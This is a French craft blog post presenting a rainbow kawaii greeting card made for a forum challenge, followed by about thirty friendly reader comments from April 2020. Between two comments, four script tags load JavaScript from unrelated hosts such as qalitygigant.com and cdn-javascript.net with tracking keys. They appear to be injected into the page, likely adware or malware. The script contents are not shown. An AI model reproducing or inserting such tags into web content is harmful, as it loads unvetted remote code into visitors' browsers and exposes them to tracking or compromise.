• Carte Kawaii pour le forum

     

     

    Carte Kawaii pour le forum

     

     

     

    A retrouver dans la Rubrique "Loisirs"-"Scrapbooking"- "ATC, Tag, autre forme de Carte" ICI

     

     

     

    Voici une carte faite pour le Forum "Au Bonheur des Cartes"

    Voici la consigne :

     

    "Faire une carte avec au moins 3 couleurs de l'arc en ciel (rouge, orange, jaune, vert, bleu, violet, rose) ou toutes si ça vous dit!
    En mode Kawaï ça serait top! Si vous n'avez pas de personnage ou d'animal kawaï vous pouvez les imprimer."

     

     

    Pour celles qui ne savent pas, voici ce qu'est un Kawaii...

     

     

     

     

     

    Carte Kawaii pour le forum

     

     

     

     

     

    Carte Kawaii pour le forum

     

     

     

     

     

    Voici ma Carte...

     

     

     

     

     

    Carte Kawaii pour le forum

     

     

     

     

     

    Carte Kawaii pour le forum

     

     

     

    A retrouver dans la Rubrique "Séparations"-"Divers" ICI

     

     

     

     

     

    Carte Kawaii pour le forum

     

     

     

     

     

    N'hésitons pas à mettre de la gaieté sur la blogosphère, on en a grandement besoin....

     

     

     

     

     

    Carte Kawaii pour le forum

     

     

     

     

     

    Carte Kawaii pour le forum

     

     

     

    A retrouver dans la Rubrique "Bisous"-"Divers" ICI

     

     


    Tags Tags : , , , , , ,
  • Commentaires

    31
    Mardi 7 Avril 2020 à 11:24

    une très belle qui m'as fait sourire. j'aime beaucoup son originalité bonne journée bisous liliane

    30
    Samedi 4 Avril 2020 à 08:44

    Adorable ta carte Valie ! Bravo ! Bisous bisous !

    29
    Vendredi 3 Avril 2020 à 22:19
    bibikafeine

    je connaissais pas les kawaii...ta carte est trop mignonne. bises

    28
    Vendredi 3 Avril 2020 à 21:01

    Hello , Valie

    je ne connaissais pas les kawaii ,je confirme c'est trop mignon ainsi que ta carte .Bravo pour le défi.

    Bisous

    27
    Vendredi 3 Avril 2020 à 10:18
    Dane

    très jolie bravo bisous bisous 

    26
    Jeudi 2 Avril 2020 à 22:05

    Très jolie ta carte Kawaï je ne connaissais pas ça

    Bisous Pierrette67

    25
    Jacline-H-49
    Jeudi 2 Avril 2020 à 17:21

    Coucou ma Valie, 

    je ne connaissais pas le kawaïi, on peut faire de très jolies choses, et ta carte le prouve bien, belle réussite.

    Ce jeudi, et oui, nous sommes jeudi, je suis complètement ramollie, mais pas de soucis ça passera, 

    Bonne fin de journée ma Valie, toi qui sais comment vaincre le confinement ! hi hi !!

    GROS BISOUS TENDRESSE de 

    Jacline 

     

    24
    mamijojo77100
    Jeudi 2 Avril 2020 à 11:31

    une carte OriginaLe drole et rigolote beau melange de couleur.. bonne journee ensoleillee, et prenons notre mal en patience..BISOUS  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1585819755339" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>
    23
    winie166
    Jeudi 2 Avril 2020 à 08:45

    très belle carte ! bisous

    22
    Elisabeth Marteen
    Jeudi 2 Avril 2020 à 07:48
    Trop chou ta carte, j'adore. Merci pour l'information sur les kawaii je ne connaissais pas.
    Gros bisous, bonne journée.
    21
    Jeudi 2 Avril 2020 à 00:47

    Voilà une carte très dynamique qui va faire un bien fou à celle qui l'a recevra !!!

    Gros bisous à toi

    20
    Mercredi 1er Avril 2020 à 20:22

    Bonsoir ma chère Valie

    Je te connaissais pas non plus ces petits personnages mais ta carte est bien belle !

    J'espère que tu as passé une bonne journée

    ici le soleil est de retour.

    Gros bisous

    Janine

    Calendriers du mois d'Avril

    19
    qinoa
    Mercredi 1er Avril 2020 à 20:00

    très Kawaï  bravo

    bzz et douce soirée

    18
    Mercredi 1er Avril 2020 à 17:57

       une  très  jolie  carte   et  en  plus  je sais  enfin  la  signification  de Kawai

     

      gros  bisous

    17
    Mercredi 1er Avril 2020 à 17:25

    Et bien je ne connaissais pas, maintenant c'est fait

    Merci pour l'info

    Bonne fin d'après-midi

    Bisous

    16
    Mercredi 1er Avril 2020 à 16:09

    Une bien jolie carte en effet, et quelle gaieté cton blog si coloré perso j'adore. Bonne prochaine journée Valie. Plein de gros bisous.

    15
    Jour de Mai
    Mercredi 1er Avril 2020 à 14:44

    Coucou Valie,

    C'est trop mignon cette carte, belle réussite, je ne connaissais pas ces petits sujets mais cela rend très bien sur une carte, c'est moderne et adorable. 

    Bravo à toi pour ta créativité. 

    Très belle journée, enfin après-midi de mercredi et surtout de très gros bisous ♥♥♥

    LN

    14
    Mercredi 1er Avril 2020 à 14:37

    Rigolote cette carte, bises Nadine

    13
    Tite-C.
    Mercredi 1er Avril 2020 à 14:32

    Carte Kawaii pour le forum à toi ma jolie Valie et merci de me faire découvrir autre chose.  Passe une https://i.postimg.cc/HLttJsPn/dub-A5-Pdj-I74de-R89-n-EH0-Aus-K3-U.gif

     

    12
    Mercredi 1er Avril 2020 à 14:13
    Elle est très réussie et parfaitement dans le thème ! J'adore ! Les couleurs, le personnage ... tout est mignon et bien choisi !
    Gros Bisous
    11
    Mercredi 1er Avril 2020 à 13:34

    Je ne connassais pas ces petits sujets.
    Bravo ,ta carte est mignonne !

    Prends bien soin de toi.
    Bises.

    10
    marianne
    Mercredi 1er Avril 2020 à 13:04

    Bravo ma belle, ta carte est géniale !!

    Gros bisous et prends bien soin de toi

    Marianne

    9
    Mercredi 1er Avril 2020 à 12:51

    C'est trop mignon ! Je ne connaissais pas ! Belles créations à toi ! Gros bisous

    8
    Mercredi 1er Avril 2020 à 12:36

    bravo valie ! j'adore ta créa !

    belle interprétation

    bisous

    7
    Mercredi 1er Avril 2020 à 12:32

    hello ma Valie 

    quelle belle page !! je suis toujours en admiration  face  à ton travail de fourmi

    Vivement que le corona s'en aille , le confinement est long

    passe une bonne journée 

    bisous

    6
    Mercredi 1er Avril 2020 à 12:17

    Très belle ta carte et originale!! C'est vrai un peu de gaieté, nous en avons besoin en ce moment......

    Bisous et douce journée

    5
    Mercredi 1er Avril 2020 à 11:24

    trop mimi ta carte kawai bravo

    bisous

    4
    Mercredi 1er Avril 2020 à 11:09

    Très sympa ce style Kawai. Moi j'aime beaucoup !

    Bises

    thaly

    3
    Mercredi 1er Avril 2020 à 11:05

    Bonjour Valie...

    Elle est magnifique cette carte.. bravo

    Passe une bonne journée

    Bisous de Pat

    2
    Mercredi 1er Avril 2020 à 10:46
    Mignon donc nawak c est réussi bravo
    Bisous
    1
    Mercredi 1er Avril 2020 à 10:32

    Je trouve ça très mignon,cette culture là me plait

    bien...c'est doudou a souhait,donc j'adore...

    Amusez vous bien avec ce style là...Bravo Valie...

    Tu sais nous distraire et nous montrer des choses 

    qui changent souvent...Douce journée,ici soleil.

    Courage...

    Je vous emmène ailleurs....

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :